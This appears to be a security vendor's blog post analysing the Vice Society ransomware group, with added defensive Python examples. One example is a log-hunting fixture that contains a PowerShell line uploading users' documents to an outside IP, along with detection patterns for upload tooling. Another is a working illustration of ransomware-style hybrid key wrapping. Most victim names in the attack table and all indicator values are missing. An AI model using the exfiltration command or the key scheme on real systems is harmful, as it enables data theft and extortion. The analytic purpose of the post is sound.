Vice Society, with a penchant for the vulnerable education sector, has made headlines this year by hitting K-12 school districts as well as healthcare and non-governmental organizations. As stated in a joint FBI and CISA advisory, cybersecurity experts expect the group to ramp up its attacks through the latter half of 2022 and into 2023.
As one of the most prolific ransomware groups of 2022, Vice Society quickly drew the attention of Securin's cybersecurity analysts, who took a deep dive into how the group operates.
In this blog:
- Securin's Detection Script for PrintNightmare Vulnerabilities
Vice Society: A Brief History
Vice Society, also tracked by Microsoft as DEV-0832, is believed to be a Russia-based group active since December 2020.
Unlike most ransomware groups, Vice Society is essentially an intrusion and extortion crew rather than the operator of a single ransomware family: it first appeared in the news in August 2021 and has been tied to intrusion, exfiltration and extortion attacks ever since.
The group has a history of deploying several ransomware families, including HelloKitty (or FiveHands), Zeppelin, and an in-house locker also named Vice Society. Because the Vice Society and HelloKitty lockers use similar extensions for encrypted files (.kitty or .crypted) and similar tactics, the two are believed to be linked.
Figure 1: Vice Society Ransomware Threat Activity
Vice Society Ransomware Cheat Sheet
Vice Society ransomware operators deploy a malicious dynamic-link library (DLL) to exploit the two PrintNightmare flaws, CVE-2021-1675 and CVE-2021-34527. They have also been observed encrypting both Windows and Linux systems with a locker built on OpenSSL (AES-256 with secp256k1 and ECDSA).
Vice Society has also been tied to the exploitation of VMware ESXi vulnerabilities, but no specific CVE has been conclusively associated with the group.
Securin Releases Detection Script to Address the PrintNightmare Vulnerabilities
In July 2021, within days of the first in-the-wild exploitation, Securin's analysts developed a detection script that lets organizations find exposed hosts and secure their attack surface against the PrintNightmare vulnerabilities. Both PrintNightmare vulnerabilities were added to CISA's Known Exploited Vulnerabilities catalog in November 2021.
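The check below is an added example and is not Securin's detection script. It evaluates a host's Print Spooler state together with the Point and Print policy values that Microsoft's PrintNightmare guidance (the CVE-2021-34527 mitigations and KB5005652) asks administrators to verify: whether the spooler accepts remote client connections, whether non-administrators may install printer drivers, and whether the Point and Print elevation prompts have been suppressed. The two host snapshots in the code are constructed; on a Windows host collect_windows() reads the live values from the registry with winreg and the service state from sc query. The severity labels and the wording of the findings are assumptions of this example.

```python
"""Evaluate a Windows host against the published PrintNightmare mitigations.
Added example; policy snapshots are constructed, not taken from a real host."""
import platform
import subprocess

# Registry locations under HKLM (policy keys set by Group Policy or directly)
PRINTERS_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers"
POINT_AND_PRINT_KEY = PRINTERS_KEY + r"\PointAndPrint"

POLICY_VALUES = {  # DWORD value name -> key it lives under
    "RegisterSpoolerRemoteRpcEndPoint": PRINTERS_KEY,          # 2 = spooler refuses remote clients
    "RestrictDriverInstallationToAdministrators": POINT_AND_PRINT_KEY,  # KB5005652, 1 = restricted
    "NoWarningNoElevationOnInstall": POINT_AND_PRINT_KEY,      # must be 0 or absent
    "UpdatePromptSettings": POINT_AND_PRINT_KEY,               # must be 0 or absent
}


def assess(spooler_running, policy):
    """Return (severity, message) findings for one host.
    policy maps value name -> DWORD; a missing entry means the value is not set."""
    if not spooler_running:
        return [("ok", "Print Spooler service is stopped; CVE-2021-1675/CVE-2021-34527 "
                       "are not reachable on this host")]
    findings = []
    if policy.get("RegisterSpoolerRemoteRpcEndPoint") != 2:
        findings.append(("warn", "Spooler accepts remote client connections (remote RPC attack "
                                 "path open); set RegisterSpoolerRemoteRpcEndPoint=2 on hosts "
                                 "that do not share printers"))
    if policy.get("NoWarningNoElevationOnInstall", 0) != 0:
        findings.append(("high", "NoWarningNoElevationOnInstall is non-zero: Point and Print "
                                 "driver installs skip the elevation prompt, the configuration "
                                 "Microsoft's guidance flags as exploitable"))
    if policy.get("UpdatePromptSettings", 0) != 0:
        findings.append(("high", "UpdatePromptSettings is non-zero: driver update prompts are "
                                 "suppressed"))
    restrict = policy.get("RestrictDriverInstallationToAdministrators")
    if restrict == 0:
        findings.append(("high", "RestrictDriverInstallationToAdministrators=0 re-enables "
                                 "non-admin driver installation, undoing the KB5005652 mitigation"))
    elif restrict is None:
        findings.append(("info", "RestrictDriverInstallationToAdministrators is not set explicitly; "
                                 "the restricted default only applies once the August 2021 or later "
                                 "update is installed, so confirm the patch level"))
    return findings


def is_exposed(findings):
    """True when at least one finding is rated high."""
    return any(severity == "high" for severity, _ in findings)


def collect_windows():
    """Read the live values on a Windows host (not used in the constructed run below)."""
    if platform.system() != "Windows":
        raise RuntimeError("registry collection only runs on Windows")
    import winreg
    policy = {}
    for name, key_path in POLICY_VALUES.items():
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
                policy[name], _ = winreg.QueryValueEx(key, name)
        except OSError:
            pass  # key or value absent: default behaviour applies
    state = subprocess.run(["sc", "query", "Spooler"], capture_output=True, text=True).stdout
    return "RUNNING" in state, policy


# Constructed host snapshots (assumed values, not real hosts)
HOST_HARDENED = {"RegisterSpoolerRemoteRpcEndPoint": 2,
                 "RestrictDriverInstallationToAdministrators": 1}
HOST_EXPOSED = {"NoWarningNoElevationOnInstall": 1, "UpdatePromptSettings": 1,
                "RestrictDriverInstallationToAdministrators": 0}

if __name__ == "__main__":
    if platform.system() == "Windows":
        running, policy = collect_windows()
    else:
        running, policy = True, HOST_EXPOSED
    for severity, message in assess(running, policy):
        print(f"[{severity}] {message}")
```

A stopped spooler short-circuits every other check because the vulnerable RPC interface is simply not there; everything else is a policy-level mitigation that only narrows the attack surface on hosts where the service must keep running.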
Securin’s Vulnerability Intelligence Platform Identifies Assets and Helps Keep Your Attack Surface Robust
Using Securin's Vulnerability Intelligence platform, Securin's experts predicted that further attacks would leverage the two PrintNightmare vulnerabilities. Here is a deeper look at how predictive analytics were used to assess the likelihood of future attacks.
CVE-2021-34527 was tagged as extremely critical from the outset and carries the highest predictive score on Securin's Vulnerability Intelligence platform, 38.46. The CVE is associated with four ransomware families: Black Basta, Vice Society, Conti and Magniber.
In contrast to CVE-2021-34527, CVE-2021-1675 did not reach Securin's top predictive score of 38.46 until February 2022, after it became associated with multiple ransomware families, including Magniber, Vice Society and Conti.
Our analysts have been tracking the PrintNightmare vulnerabilities since the first proofs of concept appeared in the wild in June 2021. Here is a graph showing how Securin predicted the exploitability of these CVEs well before they were associated with ransomware groups:
History of Attacks by Vice Society Ransomware
The group's most recent victim, Cincinnati State Technical and Community College (November 2022), follows its attack on the Los Angeles Unified School District (LAUSD), the second-largest school district in the United States, in early September 2022. That attack brought the group's capabilities into the limelight and prompted a joint advisory from the FBI, CISA and the MS-ISAC.
Other high-profile education sector attacks include the Medical University of Innsbruck in Austria, which fell prey to the group in June 2022, affecting IT systems and 3,200 students.
Here is a list of the other attacks carried out by Vice Society:
Targets | Month | Impact of the Attack
Cincinnati State Technical and Community College | November 2022 | PII and documents stolen; IT disruption affecting 10,000 students and 1,000 staff
Los Angeles Unified School District (LAUSD) | September 2022 | The city of Los Angeles and the 31 municipalities served by the district hit; PII of 640,000 students affected; 500 GB of data stolen
| June 2022 | IT disruption affecting 3,400 students
| June 2022 | Large-scale services outage impacting 1.3 million residents and tourists visiting the city
| February 2022 | Contractors' data dumped online; thousands of files posted to the leak site
| January 2022 | Card machines taken down in 600 stores, forcing some to close their doors
| December 2021 | 93,000 stolen files published by the gang
| September 2021 | All of the organization's locations disrupted; patient data stolen
| September 2021 | Several IT systems affected, including the network and the electronic medical record system
| mid-2021 | District's data dumped on the group's dark web leak site
| August 2021 | Electronic health record (EHR) downtime with extensive IT disruption
| August 2021 | Administrative servers affected; sensitive documents exfiltrated
| August 2021 | IT system disruption
Interesting Trends
- New PowerShell data theft tool: Vice Society operators were observed using a PowerShell script recovered from a Windows Event Log entry (Event ID 4104, PowerShell script block logging). The exfiltration tool relies on 'living off the land' binaries and built-in cmdlets rather than dropped tooling, which makes it less likely to be flagged by security software and keeps the intrusion quiet until the final stage, when the ransomware is deployed and encryption begins.
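The following is an added example, not the group's script or any vendor's detection content. It shows how a responder would work with script block logging: Event ID 4104 splits a long script into several records that share a ScriptBlockId and carry MessageNumber/MessageTotal counters, so the script has to be reassembled before it can be read or scored. The three event records are constructed to mimic the XML that Get-WinEvent returns, with a documentation-range IP (203.0.113.5) and a made-up script path; the indicator patterns are generic assumptions about collection and upload tooling, not signatures for Vice Society's tool.

```python
"""Reassemble PowerShell script block logs (Event ID 4104) and score them for
collection/exfiltration behaviour. Added example with constructed event records."""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed 4104 records: a two-part block that enumerates documents and uploads
# them over HTTP, plus a benign one-part block. Values are invented for the example.
SAMPLE_EVENTS = [
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4104</EventID><Computer>WS-FIN-07</Computer></System>
  <EventData>
    <Data Name="MessageNumber">1</Data><Data Name="MessageTotal">2</Data>
    <Data Name="ScriptBlockText">$ext = @('*.docx','*.xlsx','*.pdf')
$files = Get-ChildItem -Path C:\Users -Recurse -Include $ext -ErrorAction SilentlyContinue
</Data>
    <Data Name="ScriptBlockId">0f1e2d3c-0000-4000-8000-00000000aaaa</Data>
    <Data Name="Path">C:\Windows\Temp\sync.ps1</Data>
  </EventData>
</Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4104</EventID><Computer>WS-FIN-07</Computer></System>
  <EventData>
    <Data Name="MessageNumber">2</Data><Data Name="MessageTotal">2</Data>
    <Data Name="ScriptBlockText">foreach ($f in $files) { (New-Object System.Net.WebClient).UploadFile('http://203.0.113.5/up', $f.FullName) }</Data>
    <Data Name="ScriptBlockId">0f1e2d3c-0000-4000-8000-00000000aaaa</Data>
    <Data Name="Path">C:\Windows\Temp\sync.ps1</Data>
  </EventData>
</Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4104</EventID><Computer>WS-FIN-07</Computer></System>
  <EventData>
    <Data Name="MessageNumber">1</Data><Data Name="MessageTotal">1</Data>
    <Data Name="ScriptBlockText">Get-Process | Sort-Object CPU -Descending | Select-Object -First 5</Data>
    <Data Name="ScriptBlockId">9b8a7c6d-0000-4000-8000-00000000bbbb</Data>
    <Data Name="Path"></Data>
  </EventData>
</Event>""",
]

# Assumed generic indicators of collection and exfiltration; not a vendor signature.
INDICATORS = {
    "recursive file enumeration": r"Get-ChildItem\b.*?-Recurse",
    "document extension filter": r"\*\.(docx?|xlsx?|pptx?|pdf)\b",
    "HTTP upload primitive": r"Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer|UploadFile|UploadData",
    "archive staging": r"Compress-Archive|IO\.Compression",
    "encoded content": r"FromBase64String|-EncodedCommand|-enc\b",
}


def parse_event(xml_text):
    """Pull the 4104 EventData fields out of one event's XML."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {
        "id": data["ScriptBlockId"],
        "number": int(data["MessageNumber"]),
        "total": int(data["MessageTotal"]),
        "text": data["ScriptBlockText"],
        "path": data.get("Path", ""),
        "computer": root.findtext("e:System/e:Computer", default="", namespaces=NS),
    }


def reassemble(xml_events):
    """Group records by ScriptBlockId and join the parts in MessageNumber order."""
    chunks, meta = defaultdict(dict), {}
    for ev in map(parse_event, xml_events):
        chunks[ev["id"]][ev["number"]] = ev["text"]
        meta[ev["id"]] = ev
    blocks = {}
    for sid, parts in chunks.items():
        total = meta[sid]["total"]
        blocks[sid] = {
            "text": "".join(parts[n] for n in sorted(parts)),
            "complete": all(n in parts for n in range(1, total + 1)),  # any part missing?
            "path": meta[sid]["path"],
            "computer": meta[sid]["computer"],
        }
    return blocks


def score(text):
    """Names of the indicators that match the reassembled script text."""
    return [name for name, pat in INDICATORS.items()
            if re.search(pat, text, re.IGNORECASE | re.DOTALL)]


def hunt(xml_events, min_hits=2):
    """Flag script blocks that combine at least min_hits indicators."""
    findings = []
    for sid, block in reassemble(xml_events).items():
        hits = score(block["text"])
        if len(hits) >= min_hits:
            findings.append({"script_block_id": sid, "computer": block["computer"],
                             "path": block["path"], "complete": block["complete"],
                             "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Scoring the reassembled block rather than each record matters: the first record alone only shows file enumeration, and the second alone only an HTTP upload, neither of which is conclusive by itself. The complete flag tells the analyst whether the log actually contains every part or whether retention has already eaten some of it.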
Vice Society has also been observed using a custom encryptor with a strong hybrid scheme: asymmetric encryption with NTRUEncrypt combined with symmetric authenticated encryption using ChaCha20-Poly1305. The new encryptor, dubbed 'PolyVice', shares much of its code with the Chilly and SunnyDay ransomware families. It also gives Vice Society a distinctive signature: encrypted files carry the usual '.ViceSociety' extension, and the ransom note is dropped under the name 'AllYFilesAE'.
Here is a short overview of how the encryption works:
- On launch, the payload imports a pre-generated 192-bit NTRUEncrypt public key embedded by the attacker (the master key).
- It then generates a random 112-bit NTRUEncrypt private key that is unique to each victim.
- The per-victim key pair is used to encrypt the ChaCha20-Poly1305 symmetric keys, which are unique to each file.
- The per-victim NTRU private key is itself encrypted under the master public key, so the per-file keys cannot be recovered without the attacker's master private key.
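An added example, not PolyVice's code, that walks through the three-tier key hierarchy described above in Python with the cryptography library. NTRUEncrypt is not available in common libraries, so RSA-OAEP stands in for the asymmetric layer; ChaCha20-Poly1305 is used for the per-file encryption as in the text. The blob layouts (wrapped key, nonce, ciphertext) and the way the per-victim private key is sealed (a random key-encryption key wrapped under the master public key, because RSA-OAEP cannot wrap a whole private key) are assumptions made for the illustration.

```python
"""Hybrid file encryption with a per-file AEAD key, a per-victim key pair and an
attacker master key. Added example; RSA-OAEP is a stand-in for NTRUEncrypt."""
import os
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305

# Assumption: RSA-2048 with OAEP/SHA-256 replaces NTRU for the key-wrapping layer.
OAEP = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
WRAPPED_LEN = 256   # RSA-2048 ciphertext size
NONCE_LEN = 12      # ChaCha20-Poly1305 nonce size


def generate_keypair():
    """Stand-in for NTRU key generation: run once offline for the attacker's master
    key and once per infection for the victim-specific key."""
    priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    return priv, priv.public_key()


def encrypt_file(plaintext: bytes, victim_pub) -> bytes:
    """Fresh ChaCha20-Poly1305 key per file; the key is wrapped under the per-victim
    public key and stored ahead of the ciphertext (assumed layout)."""
    file_key = ChaCha20Poly1305.generate_key()
    nonce = os.urandom(NONCE_LEN)
    body = ChaCha20Poly1305(file_key).encrypt(nonce, plaintext, None)
    return victim_pub.encrypt(file_key, OAEP) + nonce + body


def decrypt_file(blob: bytes, victim_priv) -> bytes:
    """Needs the per-victim private key; a wrong key raises ValueError."""
    wrapped, nonce = blob[:WRAPPED_LEN], blob[WRAPPED_LEN:WRAPPED_LEN + NONCE_LEN]
    file_key = victim_priv.decrypt(wrapped, OAEP)
    return ChaCha20Poly1305(file_key).decrypt(nonce, blob[WRAPPED_LEN + NONCE_LEN:], None)


def seal_victim_key(victim_priv, master_pub) -> bytes:
    """Encrypt the per-victim private key so only the master private key can recover
    it. RSA-OAEP cannot wrap a whole private key, so a random key-encryption key
    (KEK) is wrapped and the serialized key is encrypted under the KEK (assumed)."""
    pem = victim_priv.private_bytes(serialization.Encoding.PEM,
                                    serialization.PrivateFormat.PKCS8,
                                    serialization.NoEncryption())
    kek = ChaCha20Poly1305.generate_key()
    nonce = os.urandom(NONCE_LEN)
    return master_pub.encrypt(kek, OAEP) + nonce + ChaCha20Poly1305(kek).encrypt(nonce, pem, None)


def open_victim_key(sealed: bytes, master_priv):
    """Attacker side: unwrap the KEK with the master private key, then the victim key."""
    kek = master_priv.decrypt(sealed[:WRAPPED_LEN], OAEP)
    nonce = sealed[WRAPPED_LEN:WRAPPED_LEN + NONCE_LEN]
    pem = ChaCha20Poly1305(kek).decrypt(nonce, sealed[WRAPPED_LEN + NONCE_LEN:], None)
    return serialization.load_pem_private_key(pem, password=None)


def simulate(plaintext: bytes) -> dict:
    """Whole chain: victim-side encryption, then attacker-side recovery."""
    master_priv, master_pub = generate_keypair()   # generated offline by the operator
    victim_priv, victim_pub = generate_keypair()   # generated on the victim host
    encrypted = encrypt_file(plaintext, victim_pub)
    sealed = seal_victim_key(victim_priv, master_pub)
    del victim_priv                                 # payload discards it after use
    recovered_priv = open_victim_key(sealed, master_priv)   # requires the master key
    return {"encrypted": encrypted, "sealed": sealed,
            "recovered": decrypt_file(encrypted, recovered_priv)}


if __name__ == "__main__":
    result = simulate(b"constructed sample document")
    print(len(result["encrypted"]), "bytes on disk;", result["recovered"])
```

The point of the third tier is visible in simulate(): once the payload discards the per-victim private key, nothing left on the host can unwrap the per-file keys, and the only path back to the data runs through the master private key that never leaves the attacker.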
Our cybersecurity experts also observed the group switching between multiple ransomware strains. Vice Society is not the first to do this; the tactic resembles that of the Sandworm Team and TA505. Vice Society has rotated between Zeppelin, BlackCat, QuantumLocker and a Vice Society-branded variant of Zeppelin.
In some attacks the group has skipped ransomware deployment altogether, instead stealing data, extorting the victim and threatening to leak the stolen files online.
Scanner Coverage: Hiding in Plain Sight?
Common vulnerability scanners such as Nessus and Qualys can detect the PrintNightmare vulnerabilities leveraged by Vice Society. Patching them, and verifying that the organization's attack surface is secure, should therefore be the foremost priority.
How does Vice Society Ransomware Attack?
Vice Society MITRE ATT&CK Map and Indicators of Compromise
Indicators of Compromise
MD5:
SHA1:
SHA256:
URL:
IP Addresses:
Other Info:
How can Securin Help Protect Your Organization Against Vice Society Ransomware Attacks?
Ransomware attacks on colleges and K-12 schools in the US alone are estimated to have cost $3.56 billion. With so many individuals at risk of data theft, improving cybersecurity going forward is the only solution. Because encrypted data is often unrecoverable, school districts need to stay ahead of the attacker.
As highlighted in Securin's Ransomware Spotlight Reports for Q2 and Q3 2022, the total number of vulnerabilities tied to ransomware has risen to 323, a 466% increase since 2019. In 2022 alone, 35 vulnerabilities became newly associated with ransomware, and 159 key ransomware-associated vulnerabilities are trending as points of interest for malicious actors. This underlines the need for continuous vulnerability management and patching to maintain good cyber hygiene.
Securin’s Attack Surface Management platform helps improve your organizational security posture through actionable insights by leveraging our excellent threat hunting expertise. Click here to learn more about Securin.
Worried about how susceptible your organization is to a ransomware attack?
Get a Ransomware Exposure Assessment done today!
Click here to talk to us.